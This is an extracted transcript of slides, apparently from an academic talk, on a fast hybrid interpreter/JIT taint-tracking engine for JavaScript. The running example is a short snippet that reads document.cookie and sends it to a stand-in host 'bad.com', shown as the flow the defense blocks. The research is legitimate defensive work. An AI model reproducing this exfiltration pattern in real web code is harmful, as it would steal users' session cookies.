document.cookie identity theft ✗ cookie stealing
TRANSCRIPT
Dynamic Taint Tracking
1. Tag a value with a taint2. Propagate taints with the value3. Block taints from untrusted sinks
Example:Cookie Stealing
Inject Taints(At confidential sources)
ck = document.cookie data = tmp + ck;
send(“bad.com”, data );
document.cookie;
Example:Cookie Stealing
Propagate Taints(At assignments, etc)
ck = document.cookie; data = tmp + ck;
send(“bad.com”, data );
ck
ck;tmp +data
data
ck = document.cookie; data = tmp + ck;
send(“bad.com”, data );
Example:Cookie Stealing
Block Taints(At untrusted sinks)
“cr=” + color
send(“bad.com”, data );
Dynamic Taint Tracking:Policies
Cookie Protectioncookie send()
Password Protectionpassword send()
✗ ✗
General Policysecret info expression✗
Dynamic Taint Tracking:JSCross site scripting prevention with dynamic data
tainting and static analysis, NDSS'07
Analyzing information flow in JavaScript-based browser extensions, ACSAC'09
An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10
10~100x slowdown
Interpreter JIT Engine
Source code
Based on Jaegermonkey
Modification M
Taint tracking logic is augmented
Language Extensions var secret = __taint(34349, 1); tmp = secret * 68; tmp2 = tmp + “345”; tmp3 = parseInt(tmp2);
alert(__taintof(tmp)); // 1 is printed
Implementation: Shadow Stack
s * 6push s //s=5push 6mul
5
6
30
6’s taint
s’ taintJoined taint
Real Stack Shadow Stack
Implementation: Shadow Property
a.fld = secret
a
fld …
fld‘s taint …
Real Properties
Shadow Properties
Hybrid Approach
Full-fledged Taint Tracking
Interpreter
Taint DetectingJIT Engine
If it doesn’t touch a taint
Hybrid Approach
Full-fledged Taint Tracking
Interpreter
Taint DetectingJIT Engine
Taint detected!!
Do full-fledgedtaint tracking
Future WorkMissing Flows
Implicit Flows, Timing Channel, etc
Empirical StudyTo prove the usability of taint tracking
ConclusionsA Fast Hybrid Taint Tracking EngineFirst JIT-enabled taint tracking engine
Still Many Missing PartsPossible to make it a protection tool?Can we sacrifice some performance?